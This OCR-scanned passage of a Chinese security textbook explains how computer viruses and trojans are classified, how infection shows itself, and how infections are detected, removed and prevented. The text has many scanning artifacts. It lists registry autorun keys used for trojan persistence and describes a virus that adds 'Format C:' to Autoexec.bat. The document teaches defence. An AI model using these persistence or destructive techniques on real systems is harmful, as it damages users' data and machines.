等 为 特定 操作 。 触 发 条 件 多 种 多 样 ,可 由 多 个 条 件 组 合 、 基 于 时 间 、 操 作 等 条 件 。 


lle. 不 可 预见 性 


不 同 种 类 的 病毒 代码 相差 很 大 ,但 有 些 操作 具有 共性 ,如 驻 内 存 、 改 中 断 等 。 利 用 这 些 
共性 已 研发 出 查 病毒 程序 ,但 由 于 软件 种 类 繁多 ,病毒 变异 难 预见 , 且 有 些 正 常 程序 也 借鉴 
了 某 些 病毒 技术 或 使 用 了 类 似 病 毒 的 操作 ,这 种 对 病毒 进行 检测 的 程序 容易 造成 较 多 误 报 ， 
而 且 病 毒 对 防 病毒 软件 往往 是 超前 的 。 

计算 机 病毒 的 生命 周期 分 为 7 个 阶段 : 开发 期 \ 传 染 期 潜伏 期 \ 发 作 期 \ 发 现 期 消化 
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期 .消亡 期 ,不 同 种 类 的 计算 机 病毒 在 每 个 阶段 的 特征 都 有 所 不 同 。 
P 4.1.3 计算 机 病毒 的 分 类 


随 着 计算 机 网 络 技术 的 快速 发 展 , 各 种 计算 机 病毒 及 变异 也 不 断 涌现 ,快速 增长 。 按 照 
病毒 的 特点 及 特性 ,其 分 类 方法 有 多 种 ,同一 种 病毒 也 会 有 多 种 不 同 的 分 法 。 


有 1. 按照 病毒 攻击 的 操作 系统 分 类 


按照 病毒 攻击 的 操作 系统 分 类 有 5 种 。 

(1) 攻击 DOS 的 病毒 。DOS 是 人 们 最 早 广泛 使 用 的 操作 系统 ,自我 保护 的 功能 和 机 制 
较 弱 ,因此 ,这 类 病毒 出 现 最 早 ,最 多 ,变种 也 最 多 。 

(2) 攻击 Windows 的 病毒 。 随 着 Windows 系统 的 广泛 应 用 ,已 经 成 为 计算 机 病毒 攻击 
的 主要 对 象 。 首 例 破 坏 计算 机 硬件 的 CIH 病毒 就 属 这 种 病毒 。 

(3) 攻击 UNIX 的 病毒 。 由 于 许多 大 型 主机 采用 UNIX 作为 主要 的 网 络 操作 系统 , 针 
对 这 些 大 型 主机 网 络 系统 的 病毒 ,其 破坏 性 更 大 范围 更 广 。 

(4) 攻击 OS/2 的 病毒 。 现 已 经 出 现 专门 针对 OS/2 系统 进行 攻击 的 一 些 病 毒 和 变种 。 

(5) 攻击 NetWare 的 病毒 。 针 对 此 类 系统 的 NetWare 病毒 已 经 产生 发展 和 变化 。 


上 2. 按照 病毒 攻击 的 机 型 分 类 


按照 病毒 攻击 的 机 型 分 类 有 3 种 。 

(1) 攻击 微机 的 病毒 。 微 机 是 人 们 应 用 最 为 广泛 的 办 公 及 网 络 通信 设备 ,因此 ,攻击 微 
型 计算 机 的 各 种 计算 机 病毒 也 最 为 广泛 。 

(2) 攻击 小 型 机 的 病毒 。 小 型 机 的 应 用 范围 也 更 加 广泛 , 它 既 可 以 作为 网 络 的 一 个 节 
点 机 ,也 可 以 作为 小 型 的 计算 机 网 络 的 主机 ,因此 ,计算 机 病毒 也 伴随 而 来 。 

(3) 攻击 服务 器 的 病毒 。 随 着 计算 机 网 络 的 快速 发 展 ,计算 机 服务 器 有 了 和 较 大 的 应 用 
空间 ,并 且 其 应 用 范围 也 有 了 较 大 的 拓展 ,攻击 计算 机 服务 器 的 病毒 也 随 之 产生 。 


1a. 按照 病毒 的 链接 方式 分 类 


通常 ,计算 机 病毒 所 攻击 的 对 象 是 系统 可 执行 部 分 ,按照 病毒 链接 方式 可 分 为 4 种 。 

(1) 源码 型 病毒 。 在 高 级 语言 程序 编译 前 插入 源 程序 中 ,经 编译 成 为 合法 程序 的 一 部 
分 ,伴随 其 中 ,一 旦 达到 设 定 的 触发 条 件 就 会 被 激活 、 运 行 ,传播 和 破坏 。 

(2) 嵌入 型 病毒 。 可 以 将 自身 嵌入 到 现 有 程序 中 ,将 计算 机 病毒 的 主体 程序 与 其 攻击 
对 象 以 插入 的 方式 进行 链接 ,一 旦 进入 程序 中 就 难以 清除 。 如 果 同 时 再 采用 多 态 性 病毒 技 
术 、 超 级 病毒 技术 和 隐蔽 性 病毒 技术 ,就 会 给 防 病毒 技术 带 来 更 严峻 的 挑战 。 

(3) 外 壳 型 病毒 。 外 壳 型 病毒 将 其 自身 包围 在 合法 的 主 程序 的 周围 ,对 原来 的 程序 并 
不 做 任何 修改 。 这 种 病毒 最 为 常见 ,又 易于 编写 ,也 易于 发 现 ,一 般 测试 文件 的 大 小 即 可 察觉 。 

(4) 操作 系统 型 病毒 。 将 自身 代码 加 入 操作 系统 中 或 取代 部 分 插件 运行 ,具有 极 强 破坏 











@— 


weer 








力 ,甚至 可 以 导致 整个 系统 的 瘫 痪 。 例 如 , 圆 点 病毒 和 大 麻 病 毒 就 是 典型 的 操作 系统 型 病毒 。 


中 4. 按照 病毒 的 破坏 能 力 分 类 


按照 病毒 破坏 的 能 力 可 划分 为 4 种 。 

(1) 无 害 型 。 除 了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 任何 破坏 。 

(2) 无 危险 型 。 只 是 减少 内 存 ,并 对 图 像 显 示 ,发 出 声音 等 略 有 影响 。 

(3) 危险 型 。 此 类 病毒 可 以 对 计算 机 系统 功能 和 操作 造成 严重 的 干扰 和 破坏 。 

(4) 非常 危险 型 。 此 类 病毒 能 够 删除 程序 ,破坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重 
要 的 文件 信息 ,甚至 控制 机 器 . 盗 取 账号 和 密码 。 





上 5. 按照 传播 媒介 不 同 分 类 


按照 计算 机 病毒 的 传播 媒介 分 类 ,可 分 为 单机 病毒 和 网 络 病毒 。 

(1) 单机 病毒 。 载 体 是 磁盘 光盘、U 盘 或 其 他 存储 介质 ,病毒 通过 这 些 存 储 介 质 传人 
硬盘 ,计算 机 系统 感染 后 再 传播 到 其 他 存储 介质 ,再 互相 交叉 传播 其 他 系统 。 

(2) 网 络 病毒 。 传 播 媒介 不 再 是 移动 式 载 体 ,而 是 相连 的 网 络 通道 ,这 种 病毒 的 传播 能 
力 更 强 更 广泛 ,因此 其 破坏 性 和 影响 力也 更 大 。 


有 6. 按照 传播 方式 不 同 分 类 


按照 计算 机 病毒 传播 方式 可 分 为 引导 型 病毒 ,文件 型 病毒 和 混合 型 病毒 3 种 。 

(1) 引导 型 病毒 。 主 要 感染 磁盘 的 引导 区 ,在 用 受 感染 的 磁盘 启动 系统 时 就 先 取得 控 
制 权 , 驻 留 内 存 后 再 引导 系统 ,并 传播 其 他 硬盘 引导 区 ,一 般 不 感染 磁盘 文件 。 

(2) 文件 型 病毒 。 以 传播 . com 和 . exe 等 可 执行 文件 为 主 ,在 调用 传染 病毒 的 可 执行 文件 
时 ,病毒 首先 被 运行 ,然后 病毒 驻 留 在 内 存 再 传播 其 他 文件 ,其 特点 是 附着 于 正常 程序 文件 。 

(3) 混合 型 病毒 。 兼 有 以 上 两 种 病毒 的 特点 , 既 感 染 引 导 区 又 感染 文件 ,因而 扩大 了 这 
种 病毒 的 传播 途径 ,使 其 传播 范围 更 加 广泛 ,其 危害 性 也 更 大 。 


7. 按照 病毒 特有 的 算法 不 同 分 类 


按照 病毒 程序 特有 的 算法 ,可 将 病毒 划分 为 6 种 。 

(1) 伴随 型 病毒 。 不 改变 原 有 程序 ,由 算法 产生 EXE 文件 的 伴随 体 , 具 有 相同 文件 名 
前缀 ) 和 不 同 的 扩展 名 , 当 操作 系统 加 载 文件 时 优先 被 执行 ,再 加 载 执行 原 EXE 文件 。 

(2) 蠕虫 型 病毒 。 将 病毒 通过 网 络 发 送 和 传播 ,不 改变 文件 和 资料 信息 。 有 时 传播 速 
度 很 快 ,甚至 达到 阻塞 网 络 或 占用 内 存 的 程度 ,造成 干扰 和 破坏 。 

(3) 寄生 型 病毒 。 主 要 依附 在 系统 的 引导 扇 区 或 文件 中 ,通过 系统 运行 进行 传播 扩散 。 

(4) 练习 型 病毒 。 病 毒 自身 包含 错误 .不 能 进行 很 好 传播 ,如 一 些 在 调试 形成 中 的 病毒 。 

(5) 诡秘 型 病毒 。 一 般 利 用 DOS 空闲 的 数据 区 进行 工作 ,不 直接 修改 DOS 和 扇 区 数 
据 , 而 是 通过 设备 技术 和 文件 缓冲 区 等 内 部 ,修改 不 易 察 觉 到 的 资源 。 
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(6) 变形 型 病毒 。 也 称 为 幽灵 病毒 ,使 用 一 些 复杂 的 算法 ,使 每 次 传播 不 同 的 内 容 和 长 
度 。 一 般 是 将 一 段 混 有 无 关 指 令 的 解码 算法 和 被 变化 过 的 病毒 体 组 成 。 


有 8. 按照 病毒 的 寄生 部 位 或 传染 对 象 分 类 


传染 性 是 计算 机 病毒 的 本 质 属 性 ,按照 寄生 部 位 或 传染 对 象 分 类 有 以 下 3 种 。 

(1) 磁盘 引导 区 传染 的 病毒 。 主 要 是 用 病毒 的 逻辑 取代 引导 记录 ,而 将 正常 的 引导 记 
录 隐 藏 在 磁盘 的 其 他 地 方 。 由 于 引导 区 是 磁盘 能 正常 使 用 的 先决 条 件 , 因 此 ,这 种 病毒 在 开 
始 运 行 时 就 获得 控制 权 , 在 运行 中 就 会 导致 引导 记录 的 破坏 ,如 “大 麻 " 和 “小 球 ” 病 毒 。 

(2) 操作 系统 传染 的 病毒 。 利 用 操作 系统 中 所 提供 的 一 些 程序 及 程序 模块 寄生 并 进行 
传染 。 它 经 常 作为 操作 系统 的 一 部 分 ,计算 机 运行 后 ,病毒 随时 被 触发 。 而 操作 系统 的 开放 
性 和 不 完善 性 给 这 类 病毒 出 现 的 可 能 性 与 传染 性 提供 了 方便 。 如 “黑色 星期 五 ”病毒 。 

(3) 可 执行 程序 传染 的 病毒 。 主 要 寄生 在 可 执行 程序 中 ,程序 执行 后 ,病毒 就 被 激活 ， 
病毒 程序 首先 被 执行 ,并 将 自身 驻 留 内 存 , 然 后 设置 触发 条 件 进行 传染 。 

以 上 三 种 病毒 可 归纳 为 两 大 类 : 引导 区 型 传染 的 病毒 和 可 执行 文件 型 传染 的 病毒 。 


上 9. 按照 病毒 激活 的 时 间 分 类 


按照 计算 机 病毒 激活 时 间 可 分 为 定时 病毒 和 随机 病毒 。 定 时 病毒 仅 在 某 一 特定 时 间 才 
发 作 ,而 随机 病毒 一 般 不 是 由 时 钟 来 激活 的 。 


> 4.1.4 计算 机 中 毒 的 异常 症状 


计算 机 病毒 是 一 段 程序 代码 ,病毒 的 存在 ,感染 和 发 作 的 特征 表现 可 分 为 三 类 : 计算 机 
病毒 发 作 前 发作 时 和 发 作 后 。 通 常 病毒 感染 比 系统 故障 情况 更 多 些 。 








1. 计算 机 病毒 发 作 前 的 情况 


计算 机 病毒 发 作 前 指 病毒 感染 并 潜伏 在 系统 内 ,直到 病毒 激发 条 件 而 发 作 前 的 一 个 阶 
段 。 此 阶段 病毒 的 行为 主要 是 以 潜伏 、 传 播 为 主 。 其 常见 的 情况 如 下 。 

(1) 突然 经 常 性 地 死机 。 感 染 了 病毒 的 计算 机 系统 ,引起 系统 工作 不 稳定 ,造成 死机 。 

(2) 无 法 正常 启动 操作 系统 。 开 机 后 ,系统 显示 启动 文件 缺少 或 被 破坏 ,无 法 启动 。 

(3) 运行 速度 明显 变 慢 。 可 能 是 病毒 占用 了 大 量 系统 资源 或 占用 了 大 量 的 处 理 器 
时 间 。 

(4) 经 常 发 生 内 存 不 足 情况 。 正 常 使 用 出 现 内 存 不 足 , 很 可 能 是 病毒 占据 了 内 存 空 间 。 

(5) 打印 和 通信 有 异常。 打印机 无 法 打印 操作 或 打印 出 乱码 ,或 串口 设备 无 法 正常 工作 。 

(6) 经 常 出 现 非法 错误 。 突然 系 统 功能 异常 ,增加 了 非法 错误 或 死机 。 

(7) 基本 内 存 发 生变 化 。 可 能 是 计算 机 系统 感染 了 引导 型 病毒 或 病毒 占据 内 存 。 

(8) 应 用 程序 系统 时 间 及 软件 大 小 变异 。 

(9) 无 法 另存 为 Word 文档 或 出 现 异 常 。 
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(10) 磁盘 容量 又 减 。 若 没 安装 新 程序 ,系统 可 用 磁盘 容量 却 骤 减 。 

经 常 浏览 网 页 .回收 站 文件 过 多 ,临时 文件 多 或 大 ,系统 曾 意外 断 电 等 ,也 可 能 造成 类 似 
情况 。 另 外 , Windows 内 存 交换 文件 , 随 着 运行 程序 增加 也 会 增 大 。 

(11) 难以 调用 网 络 驱 动 器 卷 或 共享 目录 。 无 法 访问 、 浏 览 、 建 立 目录 等 正常 操作 。 

(12) 陌生 的 垃圾 邮件 。 收 到 陌生 的 电子 邮件 ,邮件 标题 一 般 具 有 诱惑 性 。 

(13) 自动 链接 陌生 网 站 。 联 网 的 计算 机 自动 连接 一 个 陌生 网 站 ,或 上 网 时 发 现 网 络 运 
行 很 慢 , 出 现 异常 的 网 络 链接 现象 。 


有 2. 计算 机 病毒 发 作 时 的 症状 


(1) 提示 无 关 对 话 。 操 作 时 提示 一 些 无 关 的 对 话 框 或 提示 信息 。 

(2) 发 出 声响 。 一 种 恶作剧 式 的 病毒 ,在 发 作 时 会 发 出 一 些 音乐 。 

(3) 产生 图 像 。 只 在 发 作 时 影响 用 户 显 示 界面 ,干扰 正常 使 用 。 

(4) 硬盘 灯 不 断 闪 烁 。 当 对 硬盘 有 持续 大 量 的 读 写 操作 时 ,硬盘 的 灯 就 会 不 断 闪烁 。 
(5) 算法 游戏 。 以 某 些 算法 游戏 中 断 运 行 , 赢 了 才 可 继续 。 

(6) 桌面 图 标 发 生变 化 。 修 改 图 标 或 将 快捷 方式 图 标 改 成 默认 图 标 ,迷惑 用 户 。 

(7) 突然 重启 或 死机 。 有 些 病毒 发 作 时 ,出 现 系 统 重启 或 死机 现象 。 

(8) 自动 发 送 邮 件 。 邮 件 病毒 采用 自动 发 送 的 方式 进行 传播 。 

(9) 自 移动 鼠标 。 在 没有 操作 情况 下 ,屏幕 上 的 鼠标 却 自 动 移动 。 





有 3. 计算 机 病毒 发 作 后 的 后 果 


绝 大 部 分 计算 机 病毒 都 属于 “恶性 ”病毒 ,发 作 后 常会 带 来 重大 损失 。 恶 性 计算 机 病毒 
发 作 后 的 情况 及 造成 的 后 果 如 下 。 

(1) 硬盘 无 法 启动 ,数据 丢失 。 病 毒 破坏 硬盘 的 引导 扇 区 后 ,无 法 从 硬盘 启动 系统 。 病 
毒 修改 硬盘 的 关键 内 容 ( 如 文件 分 配 表 、 根 目录 区 等 ) 后 ,可 使 保存 的 数据 丢失 。 

(2) 文件 丢失 或 被 破坏 。 病 毒 删除 或 破坏 系统 文件 ,文档 或 数据 ,可 能 影响 系统 启动 。 

(3) 文件 目录 混乱 。 目 录 结 构 被 病毒 破坏 ,目录 扇 区 为 普通 扇 区 , 填 和 人 无关 数 据 而 难以 
恢复 。 或 将 原 目 录 区 移 到 硬盘 其 他 扇 区 ,可 正确 读 出 目录 扇 区 .并 在 应 用 程序 需要 访问 该 目 
录 时 提供 正确 目录 项 ,表面 看 正常 。 无 此 病毒 后 ,将 无 法 访问 到 原 目 录 扇 区 ,但 可 恢复 。 

(4) BIOS 程序 混乱 使 主板 遭 破 坏 。 如 同 CIH 病毒 发 作 后 的 情形 ,系统 主板 上 的 BIOS 
被 病毒 改写 ,致使 系统 主板 无 法 正常 工作 ,计算 机 系统 被 破坏 。 

(5) 部 分 文档 自动 加 密 。 病 毒 利用 加 密 算法 ,将 密 钥 保存 在 病毒 程序 内 或 其 他 隐蔽 处 ， 
使 感染 的 文件 被 加 密 , 当 内 存 中 驻 留 此 病毒 后 ,系统 访问 被 感染 的 文件 时 可 自动 解密 ,不 易 
察觉 。 一 旦 此 种 病毒 被 清除 ,被 加 密 的 文档 将 难以 恢复 。 

(6) 计算 机 重启 时 格式 化 硬盘 。 在 每 次 系统 重新 启动 时 都 会 自动 运行 Autoexec. bat 文 
件 ,病毒 通过 修改 此 文件 ,并 增加 Format C: 项 ,从 而 达到 破坏 系统 目的 。 

(7) 导致 计算 机 网 络 瘫 痪 ,无 法 正常 提供 服务 。 
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4.2 计算 机 病毒 检测 清除 与 防范 


计算 机 病毒 危害 和 威胁 极 大 ,必须 “预防 为 主 ,补救 为 辅 ", 采 取 防 范 和 实时 监测 是 最 有 
效 的 措施 ,如 果 不 慎 被 病毒 感染 ,就 要 设法 进行 清除 。 


P 4.2.1 计算 机 病毒 的 检测 


对 系统 进行 检测 ,可 以 及 时 掌握 系统 是 否 感染 病毒 ,以 及 被 感染 的 情况 ,以 便于 及 时 对 
症 处 理 。 检 测 病毒 方法 有 特征 代码 法 、 校 验 和 法 ,行为 监测 法 、 软 件 模拟 法 。 


i. 特征 代码 法 


特征 代码 法 是 检测 已 知 病毒 的 最 简单 、 开 销 较 小 的 方法 ,早期 应 用 于 SCAN、CPAYV 等 
著名 病毒 检测 工具 中 。 其 检测 步骤 为 采集 中 毒 样本 ,并 抽取 特征 代码 。 原 则 上 抽取 的 代码 
具有 特殊 性 ,不 能 与 普通 正常 程序 代码 相同 。 在 保持 唯一 性 的 前 提 下 ,尽量 使 特征 代码 长 度 
短 些 ,以 减少 空间 与 时 间 。 在 感染 COM 文件 又 感染 EXE 文件 的 病毒 样本 中 ,要 抽取 两 种 样 
本 所 共有 的 代码 ,将 特征 代码 纳入 病毒 数据 库 。 打 开 被 检测 文件 ,然后 在 文件 中 搜索 ,检查 
文件 中 是 否 含有 病毒 库 中 的 病毒 特征 码 。 可 利用 特征 代码 与 病毒 一 一 对 应 关系 ,断定 被 查 
文件 中 患 有 哪 种 病毒 。 采 用 的 检测 工具 ,需要 及 时 更 新 病毒 库 。 其 优点 是 检测 准确 快速 、 可 
识别 病毒 的 名 称 、. 误 报警 率 低 、 依 据 检测 结果 可 及 时 杀毒 处 理 。 缺 点 是 不 能 检测 未 知 病毒 、 
检测 量 大 ,长 时 间 检 测 使 网 络 性 能 及 效率 降低 。 


Nz: 校 验 和 法 


校 验 和 法 是 指 在 使 用 文件 前 或 定期 地 检查 文件 内 容 前 后 的 校 验 和 变化 ,发 现 文件 是 否 
被 感染 的 一 种 方法 。 既 可 发 现 已 知 病毒 又 可 发 现 未 知 病毒 , 却 无 法 识别 病毒 类 和 病毒 名 。 
文件 内 容 的 改变 可 能 是 病毒 感染 所 致 ,也 可 能 是 正常 程序 引起 的 , 它 对 正常 文件 内 容 的 变化 
难以 辨识 且 敏 感 , 误 报 多 , 且 影 响 文件 的 运行 速度 。 这 种 方法 对 软件 更 新 、 变 更 密码 ,修改 运 
行 参数 时 都 会 误 报警 ,而 对 隐蔽 性 病毒 无 效 。 隐 蔽 性 病毒 进驻 内 存 后 ,会 自动 剥 去 染 毒 程序 
中 的 病毒 代码 ,使 校 验 和 法 受骗 ,对 中 毒 文件 算出 正常 校 验 和 。 


Ls. 行为 监测 法 


行为 监测 法 是 利用 病毒 的 行为 特征 监测 病毒 的 一 种 方法 。 病 毒 的 一 些 行为 特征 比较 特 
殊 且 具有 其 共性 ,监视 程序 运行 ,可 发 现 病毒 并 及 时 报警 。 通 常 系统 启动 时 ,引导 型 病毒 占 
用 int 13H 攻击 Boot 扇 区 或 主 引导 扇 区 获得 执行 权 , 而 其 他 系统 功能 未 设置 好 导致 无 法 利 
用 ,然后 在 其 中 放置 病毒 所 需 代 码 ,病毒 常 驻 内 存 后 ,为 了 防止 被 覆盖 ,修改 系统 内 存 总 量 ， 
然后 通过 写 操作 感染 COM、EXE 文件 ,致使 病毒 先 运行 ,宿主 程序 后 执行 。 当 切换 时 可 表 
现 出 许多 特征 行为 。 其 优点 是 可 发 现 未 知 病毒 ,准确 地 预报 未 知 的 多 数 病毒 ; 缺点 是 误 报 
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警 .无 法 识别 病毒 名 称 、 实 现 难 度 较 大 。 


上 4. 软件 模拟 法 


多 态 性 病毒 代码 密码 化 , 且 每 次 激活 的 密 钥 各 异 ,对比 染 毒 代码 也 无 法 找 出 共性 特征 的 
稳定 代码 。 此 时 特征 代码 法 无 效 , 而 行为 检测 法 虽然 可 检测 多 态 性 病毒 ,但 是 在 检测 出 病毒 
后 ,因为 不 知道 病毒 的 种 类 ,也 难于 进行 杀毒 处 理 ,只 好 借助 于 软件 模拟 ,进行 智能 辨识 检 
测 。 目 前 ,很 多 杀毒 软件 已 具有 实时 监测 功能 ,在 预防 病毒 方面 效果 也 很 好 。 


> 4.2.2 常见 病毒 的 清除 方法 


计算 机 系统 意外 中 毒 ,需要 及 时 采取 措施 ,常用 的 处 理 方法 是 清除 病毒 。 

(1) 对 系统 被 破坏 的 程度 调查 评估 ,并 有 针对 性 地 采取 有 效 的 清除 对 策 和 方法 。 对 一 
般 常见 的 计算 机 病毒 ,通常 利用 杀毒 软件 即 可 清除 , 若 单 个 可 执行 文件 的 病毒 不 能 被 清除 ， 
可 将 其 删除 ,然后 重新 安装 。 若 多 数 系统 文件 和 应 用 程序 被 破坏 , 且 中 毒 较 重 , 则 最 好 删除 
后 重新 安装 。 而 当 感染 的 是 关键 数据 文件 ,或 受 破坏 较 重 ,如 硬件 被 CIH 病毒 破坏 时 ,就 可 
请 病毒 专业 人 员 进 行 清除 和 数据 恢复 。 修 复 前 应 备份 重要 的 数据 文件 ,不 能 在 被 感染 破坏 
的 系统 内 备份 ,也 不 应 与 平时 的 常规 备份 混在 一 起 ,大 部 分 杀毒 软件 杀毒 前 基本 都 可 保存 重 
要 数据 和 被 感染 的 文件 ,以 便 在 误杀 或 出 现 意 外 时 进行 恢复 。 

(2) 安装 ,启动 或 升级 杀毒 软件 ,并 对 整个 硬盘 进行 扫描 检测 。 有 些 病 毒 在 Windows 下 
难以 完全 清除 ,如 CIH 病毒 , 则 应 使 用 未 感染 病毒 的 DOS 系统 启动 ,然后 在 DOS 下 运行 杀 
毒 软件 进行 清除 。 杀 毒 后 重启 计算 机 ,再 用 防 杀 病毒 软件 检查 系统 ,并 确认 完全 恢复 正常 。 


PP 4.2.3 计算 机 病毒 的 防范 


计算 机 病毒 的 防范 侧重 于 其 检测 和 清除 ,对 病毒 的 防范 工作 是 一 项 系统 工程 ,需要 全 社 
会 的 共同 努力 。 国 家 以 科学 .严谨 的 立法 和 严格 的 执法 打击 病毒 的 制造 者 和 蓄意 传播 者 , 同 
时 建立 专门 的 计算 机 病毒 防治 机 构 及 处 理 中 心 , 从 政策 与 技术 上 组 织 ,. 协 调和 指导 全 国 的 计 
算 机 病毒 防治 。 通 过 建立 科学 有 效 的 计算 机 病毒 防范 体系 和 制度 ,实时 检测 、 及 时 发 现 计算 
机 病毒 的 侵入 ,并 采取 有 效 的 措施 过 制 病毒 的 传播 和 破坏 ,尽快 恢复 受 影响 的 计算 机 系统 和 
数据 。 企 事业 单位 应 牢固 树立 “预防 为 主 ” 的 思想 ,制定 出 一 系列 具体 有 效 的 、 切 实 可 行 的 管 
理 措施 ,以 防止 病毒 的 相互 传播 ,建立 定期 专项 培训 制度 ,提高 计算 机 使 用 人 员 的 防 病毒 意 
识 。 个 人 用 户 也 要 遵守 病毒 防治 的 法 纪 和 制度 ,不 断 学 习 、 积 累 防治 病毒 的 知识 和 经 验 , 养 
成 良好 的 防治 病毒 习惯 , 既 不 制造 病毒 ,也 不 传播 病毒 。 

计算 机 病毒 防范 制度 是 防范 体系 中 每 个 成 员 都 必须 遵守 的 行为 规程 ,为 了 确保 系统 和 
业务 的 正常 安全 运行 ,必须 制定 和 完善 切合 实际 的 防范 体系 和 防范 制度 ,并 认真 进行 管理 和 
运作 。 对 于 重要 部 门 ,应 做 到 专机 专用 。 对 于 具体 用 户 , 一 定 要 遵守 以 下 规则 和 习惯 : 配备 
杀毒 软件 ,并 及 时 升级 ; 留意 有 关 的 安全 信息 .及 时 获取 并 打 好 系统 补丁 ; 至 少 保证 经 常备 
份 文件 并 杀毒 一 次 ; 对 于 一 切 外 来 的 文件 和 存储 介质 都 应 先 查 毒 后 使 用 ; 一 旦 遭 到 大 规模 
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的 病毒 攻击 ,应 立即 采取 隔离 措施 ,并 向 有 关 部 门 报告 ,再 采取 措施 清除 病毒 ; 不 单 击 不 明 
网 站 及 链接 ; 不 使 用 盗版 光盘 ; 不 下 载 不 明文 件 和 游戏 等 。 


P 4.2.4 木马 的 检测 清除 与 防范 


随 着 计算 机 网 络 的 广泛 应 用 ,木马 的 攻击 及 危害 性 更 大 。 它 常 以 隐蔽 的 方式 依附 在 一 
些 游戏 ,视频 、 歌 曲 等 应 用 软件 中 ,可 随同 下 载 的 文件 进入 计算 机 系统 ,运行 后 发 作 , 在 进程 
表 及 注册 表 中 留 下 信息 ,对 其 检测 清除、 防范 具有 一 定 特殊 性 。 


Li 木马 的 检测 方法 


1) 检测 系统 进程 

通常 木马 在 进程 管理 器 中 运行 后 出 现 异常 ,与 正常 进程 的 CPU 资源 占用 率 和 句柄 数 的 
比较 ,发 现 其 症状 。 对 系统 进程 列表 进行 分 析 和 过 滤 , 即 可 发 现 可 疑 程序 。 

2) 检查 注册 表 \ini 文件 和 服务 

木马 为 在 开机 后 自动 运行 ,经 常 在 注册 表 的 下 列 选项 中 添加 注册 表 项 。 

HKEY_LOCRAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 

HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 

HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 

HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 

【案例 4-3】 木马 可 在 Win. ini 和 System. ini 的 “run 一 ”load 二 ”shell 二 ”后 面 加 载 , 若 
在 这 些 选项 后 的 加 载 程序 很 陌生 ,可 能 就 是 木马 。 它 通常 将 Explorer 变 为 自身 程序 名 ,只 需 
将 其 中 的 字母 1 改 为 数字 1, 或 将 字母 o 改 为 数字 0, 不易 被 发 现 。 

在 Windows 中 ,木马 作为 服务 添加 到 系统 中 ,甚至 随机 替换 系统 没 启动 的 服务 程序 进 
行 自动 加 载 ,检测 时 应 注意 操作 系统 的 常规 服务 。 

3) 检测 开放 端口 

远程 控制 型 或 输出 Shell 型 木马 , 常 在 系统 中 监听 一 些 端口 ,接收 并 执行 从 控制 端 发 出 
的 命令 。 通 过 检测 系统 上 开启 的 异常 端口 , 即 可 发 现 木 马 。 在 命令 行 中 执行 netstat -na 命 
令 , 可 看 见 系统 打开 的 端口 和 连接 。 也 可 用 FPort 等 端口 扫描 检测 软件 ,查看 打开 端口 的 进 
程 名 、 进 程 号 和 程序 的 路 径 等 信息 。 

4) 监视 网 络 通 信 

利用 网 际 控制 信息 协议 ICMP 数据 通信 的 木马 ,被 控 端 无 打开 的 监听 端口 ,无 反 向 连 
接 , 使 其 无 法 建立 连接 ,此 时 不 能 采用 检测 开放 端口 的 方法 。 可 先 关 闭 所 有 网 络 行为 的 进 
程 ,然后 利用 Sniffer 监听 , 若 仍 有 大 量 的 数据 , 则 可 以 断定 木马 正在 后 台 运 行 。 


12. 木马 的 清除 方法 


1) 手工 删除 
对 于 一 些 可 疑 文件 应 当 慎 重 ,以 免 误 删 系统 文件 而 使 系统 无 法 正常 工作 。 首 先 备份 可 
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疑 文件 和 注册 表 , 再 用 Ultraedit32 编辑 器 查看 文件 首部 信息 ,通过 对 其 中 的 明文 字符 对 木 
马 查看 。 还 可 通过 W32DASM 等 专用 反 编译 软件 对 可 疑 文 件 静态 分 析 , 查 看 文件 的 导入 函 
数列 表 和 数据 段 部 分 ,查看 程序 的 主要 功能 ,最 后 删除 木马 文件 及 注册 表 中 键 值 。 

2) 杀毒 软件 清除 

由 于 木马 程序 变异 及 自我 保护 机 制 ,一 般 用 户 最 好 利用 专用 的 杀毒 软件 进行 杀毒 ,并 对 
杀毒 软件 及 时 更 新 ,并 通过 网 络 安全 病毒 防范 公告 及 时 掌握 新 木马 的 预防 和 查 杀 方法 。 


1s. 木马 的 防范 方法 


1) 堵 住 控制 通路 

如 果 网 络 连 接 处 于 禁用 或 取消 连接 状态 , 却 出 现 反复 启动 .打开 窗口 等 异常 情况 ,计算 
机 可 能 中 了 木马 。 断 开 网 络 或 拔 掉 网 线 , 即 可 避免 远 端 计算 机 通过 网 络 对 其 控制 ,也 可 在 清 
除 木马 后 重 设防 火 墙 . 加 固 或 过 滤 端 口 等 进行 防护 。 

2) 堵 住 可 疑 进程 

通过 进程 管理 软件 (或 Windows 自 带 的 任务 管理 器 ) 查 看 可 疑 进程 ,以 其 工具 结束 可 疑 
进程 后 计算 机 正常 ,表明 可 疑 进程 被 远程 控制 , 则 需 尽 快 堵 住 此 进程 。 

3) 利用 查 毒 软件 

利用 新 查 杀 病毒 软件 的 新 技术 、 新 功能 “ 查 杀 木马 引擎 光 木 马 行为 分 析 ” 和 * 启 发 式 扫 
描 ? 等 技术 ,增强 了 对 病毒 木马 的 拦截 和 查 杀 能 力 。 


> 4.2.5 病毒 和 防 病毒 技术 的 发 展 趋势 


只 有 及 时 了 解 计 算 机 病毒 的 发 展 变化 ,掌握 计算 机 病毒 的 最 新 发 展 趋势 和 最 新 防范 技 
术 , 才 能 更 有 效 地 进行 防范 。 





由 1. 计算 机 病毒 的 发 展 趋势 


(1) 新 病毒 更 加 隐蔽 ,针对 查 毒 软件 而 设计 的 多 形态 病毒 使 查 毒 更 难 。 

(2) 可 以 生成 工具 常 以 菜单 形式 驱动 ,只 要 生成 工具 即 可 轻易 地 制造 出 病毒 ,而 且 可 设 
计 出 非常 复杂 的 具有 偷盗 和 多 形态 特征 的 病毒 。 通 过 网 络 广泛 利用 木马 实施 攻击 。 

(3) 病毒 攻击 计算 机 时 ,可 窃取 某 些 中 断 功能 ,并 借助 DOS 完成 操作 。 而 一 些 超级 病毒 
技术 可 对 抗 计算 机 病毒 的 预防 技术 ,进行 感染 破坏 时 , 防 病毒 工具 根本 无 法 获取 运行 的 机 
会 ,使 病毒 的 感染 破坏 顺利 进行 。 


2. 病毒 防范 技术 的 发 展 趋势 


